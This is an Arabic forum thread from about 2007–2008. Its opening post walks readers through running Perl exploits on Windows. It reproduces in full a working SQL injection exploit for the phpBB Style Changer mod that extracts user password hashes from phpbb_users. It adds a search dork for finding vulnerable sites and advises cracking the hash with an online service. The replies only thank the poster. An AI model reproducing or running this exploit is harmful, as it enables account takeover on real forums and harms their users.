العاب
منتدى دلع نجد ينتهي بتاريخ 22-8-2008 شبكة خيالي ينتهي الاعلان في 11-9-2008
علك بنات موقع للبنات ينتهي الاعلان في 27-8_2008 منتديات توم وجيري
رسائل قصيره sms احلى الليالي ينتهي الاعلان في 2 _9_208
على كيفك ينتهي في 28_8_2008 مركز تحميل الصور
  الفنان
Download Direct

العودة   منتديات برق > منتديات برق التقنية > الحماية من الهكر و الاختراق
التسجيل مركز تحميل برق قائمة الأعضاء التقويم البحث مشاركات اليوم اجعل كافة الأقسام مقروءة

الحماية من الهكر و الاختراق حماية موقعك حماية بريدك من الهكر حماية ايميلك يمنع نهائيا نشر اي موضوع اختراق او فيه ضرر على المسلمين مهما كانت نيته

استضافة بوابة العرب ينتهي الاعلان في 4-10-2008

شات سعودي-منتديات منتديات اغاني  :: برامج نوكيا: بلوتوث :: زواج ::

شرح طريقة استغلال ثغرات البيرل

إضافة رد
 
LinkBack أدوات الموضوع إبحث في الموضوع
قديم 11-13-2007, 11:55 PM   #1
:: مشرفة منتدى الترحيب ::
 
الصورة الرمزية ياعيون دلع
 






معدل تقييم المستوى: 1ياعيون دلع is on a distinguished road
افتراضي شرح طريقة استغلال ثغرات البيرل


بسم الله الرحمن الرحيم
السلام عليكم ..
اليوم شباب غالى حشرح لكم طريقة استغلال ثغرات البيرل بعد الطلب من بعض المهتمين وعلى فكرة يا شباب فى ناس الانانية فى طبعهم تدخل تستفيد و من غير ان تضع كلمة شكر على الموضوع او على الاقل تفيد بأى معلومة جديدة يا ريت اشوف ردودكم و استفسارتكم
ندخل فى الجد بقى
طبعآ درس اليوم بيتكلم عن طريقة استغلال الثغرات المكتوبة بالغة من احد اللغات المعروفة و القوية ايضآ و هى لغة البيرل .. قبل ان نبدآ يجب ان نتعلم شىء مهم و هو كيفية معرفة الثغرات المكتوبة بالغة البيرل ..؟
عندما ننظر الى اى كود و نجد فى بدايتة :

رمز:
#!/usr/bin/perlاذآ علينا ان نعلم ان الثغرة التى سوف نتعامل معها هى احدى الثغرات المكتوبة بلغة البيرل ..
طريقة الاستغلال :
ــــــــــــــــــــــــــــــــــ
اولا:: اذا كنتم من مستخدمين بيئة الليونكس فهذا شىء ممتاز جدآ و لا حاجة لاى برنامج و اعتقد ايضآ انكم لستو فى حاجة لقرأة هذى الدرس .
اما اذا كنتم من مستخدمى بيئة الويندوز فعليكم بأستخدم برنامج ActivePerl
و ذالك لعمل كوبيلر لاكواد البيرل .
و هذة وصلة للبرنامج ::
http://www.cse.unsw.edu.au/~homecomp...SWin32-x86.msi
الان بعد تحميل البرنامج و عمل Setup لة على الجهاز سوف يكون على هذا المسار .

رمز:
C:\Perlالان كل شىء تمام نبدآ العمل
بعد ان نجد احد الثغرات مثال حناخد كمثال احد الثغرات اللى وضعتهم لكم فى قسم الثغرات و هى ::

رمز:
#!/usr/bin/perl
################################################## #######
# _______ _______ ______ #
# |______ |______ | \ #
# ______| |______ |_____/ #
# #
#phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT #
#Created By SkOd #
#SED security Team #
#http://www.sed-team.be #
#skod.uk@gmail.com #
#ISRAEL #
################################################## #######
#google:
#"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
################################################## #######
use IO::Socket;
if (@ARGV < 3){
print q{
################################################## ##########
# phpBB Style Changer\Viewer MOD SQL injection Exploit #
# Tested on phpBB 2.0.19 #
# created By SkOd. SED Security Team #
################################################## ##########
bbstyle.pl [HOST] [PATH] [Target id]
bbstyle.pl www.host.com /phpbb2/ 2
################################################## ##########
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print "[+]Make Connection\n";
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";
}اول شىء نعملة بعد معرفتنا ان هذا الكود لاحد ثغرات البيرل هو اننا نأخد الكود كلة Copy ونضعة Past فى الـ Notbad و نغلقها حيطلب منك عمل Save نضغط على كلمة Yes الان لدينا الكود على هيئة txt علينا ان نغير الامتداد من txt الى pl نفترض اننا سوف نقوم بتسمية الملف exploit.txt علينا ان نغير txt ليصبح بهذا الشكل exploit.pl الان و بعد التأكد من اتمام هذة العملية بنجاح علينا ان ضع الملف exploit.pl داخل الملف bin على هذا المسار

رمز:
C:\Perl\binو بعد و ضع الملف داخل هذا المجلد نذهب الى الـ Run الموجودة ضمن قائمة Start و نكتب cmd سيظهر لنا شاشة الدوس بهذا الشكل ::

و بعد ذالك ::


و بعد ان يتم عمل الترجمة لملف البيرل و يفتح امامنا سوف نشاهد طريقة الاستخدام الخاص لهذة الثغرة و كل ثغرة لها طريقة الاستخدام الخاصة بها و فى مثالنا هذا ::

و اعتقد المثال و اضح نكتب المطلوب بنفس الاسلوب اللى موجود فى الصورة اللى بالاعلى و نظغط انتر و شوفو النتيجة على حسب نوع الثغرة و عند الحصور على الباسورد بيكون بشكل مشفر ماعليك الا انك تفكة بأى برنامج او موقع من مواقع فك الباسورد ..
..:: اعزرونى اذا كان فى اى تقصير فى الشرح يا شباب و ان شاء الله اى استفسار انا حاضر ::..
و انتظرو شرح طريقة استغلال ثغرات الـ php و الــ Pm قريبآ ان شاء الله
تحياتى للجميع
برنـــــــ اوف دارك ــــــــــس



منقول للافاده


[img][/img]

منتديات مزايين1-2-2008

من مواضيع ياعيون دلع في المنتدى
0 لأول مرة وحصريا على منتديات برق... حلقات رعب وسلسلة ما وراء الطبيعة
0 كلمات اغانى اجنبيه
0 برنامج تحويل الصوتيات من الريال بلاير الى ام بى ثرى والى ميديا والعكس
0 رهينه الاحزان
0 أجمل تعليق
0 صور سيارة Saab 9-7x Aero 2008
0 الدليل على عالميه عمرو دياب هنا تاكد بنفسك
0 بوسه كبيـــــــــــــــــــــره
0 صور للمسنجر انشالله تعجبكم...
0 برنامج جديد Reflet.exe لعمل تموج مائي على الصور
0 صور من داخل مدرسه أمريكيه .. سبـ ح ــان الله
0 بعض ثغرات المنتديات راجيه من الله الاستفاده
0 صور الدود ياكل وجه مايكل جاكسون
0 كليبات عمرو دياب بوصلات مباشره
0 آه يازمن
0 إساءة جديدة للنبي بالسويد
0 لن اقول وداعاً
0 اغنيه حماده هلال والله وعملوها الرجاله
0 اغانى عمرو دياب بوصلات مباشره
0 اعلانات عمرو دياب

ياعيون دلع غير متواجد حالياً   رد مع اقتباس
قديم 02-19-2008, 05:05 PM   #2
-||[عضو منــورنـا]||-
 





معدل تقييم المستوى: 0zaradusht is on a distinguished road
افتراضي

بارك الله فيك اخي الغالي و جازاك الف خير على هذ الشرح المتميز معى اني اعرف ان الرد متأخر لكن اخي هذه اول مشارك لي في هذا المنتدى حياك الله اخي الكريم

منتديات مزايين1-2-2008


zaradusht غير متواجد حالياً   رد مع اقتباس
قديم 02-24-2008, 08:38 PM   #3
-||[عضو منــورنـا]||-
 





معدل تقييم المستوى: 0عاشق الرومنسية is on a distinguished road
افتراضي

يسلمك ربي يالغالي

شرح متميز اوافي
لك جزيل الشكر والامتنان

تقبل تحياتي وتمنياتي 0-

منتديات مزايين1-2-2008

من مواضيع عاشق الرومنسية في المنتدى

عاشق الرومنسية غير متواجد حالياً   رد مع اقتباس
إضافة رد


أدوات الموضوع إبحث في الموضوع
إبحث في الموضوع:

البحث المتقدم

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
التلقيح الصناعي أو الإخصاب داخل أو خارج الجسم مينوو طب - صحه - غذاء - الطب البديل - اعشاب - ريجيم 6 02-13-2008 11:30 AM
أفضل 16 طريقة لجماع الزوجة جداوي فله طب - صحه - غذاء - الطب البديل - اعشاب - ريجيم 6 02-09-2008 01:42 AM
طريقة فتح كمبيوتر مقفل برقم سري (باسورد) ღ الحــــزن ღ برامج كمبيوتر 12 10-07-2007 06:49 PM

مسلسلات تركية
--العاب-شات-دردشة-دردشه-منتديات-تحميل العاب-برامج كمبيوتر-توبيكات ماسنجر-برامج جوال-مقاطع بلوتوث-مسجات-نغمات-ثيمات-صور-صور بنات-اخبار الفن-صور فنانات-افلام-اناشيد اسلامية-صور سيارات-سياحة-منتديات عامة-منتديات اسلامية-كاريكاتير--نكت--خواطر-روايات-شعر-قصص--امثال و حكم-ازياء-فساتين-حلويات-طبخ--صحة و الطب و طب الاعشاب و الطب البديل -علم النفس--صور-منتديات- العاب بنات جميلة-افلام حب -اغاني-العاب حلوه-منتديات برق الترفيهية-تحميل برامج جديده-توبيكات ملونه-توبيكات جديده-توبيكات ملونه بالصور-توبيكات للماسنجر--تحميل صور-العاب شمس-العاب للبنات فقط-العاب-اغاني--افلام-افلام حب-شعر حب-كلمات حب--يوتيوب-السعودية--العاب طبخ-العاب-مسلسلات-عيون-اغرب-احلى-اجمل-اروع-جديد-حلو-مصر-منتدى
الساعة الآن 08:35 AM.


Powered by vBulletin® Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
SEO by vBSEO 3.2.0

تطوير وحماية » هكسل لخدمات الويب المتكاملة

المقالات أو المشاركات أو الآراء المنشورة في شبكة منتديات برق بأسماء أصحابها أو بأسماء مستعارة لا تمثل بالضرورة الرأي الرسمي لشبكة برق بل تمثل وجهة نظر كاتبها.
منتديات برق منتديات عربية سعودية خليجية سنية يمنع نشر اي كراك او انتهاك لاي حقوق ادبية او فكريه ان كل ما يشنر في منتديات برق هو ملك لاصحابه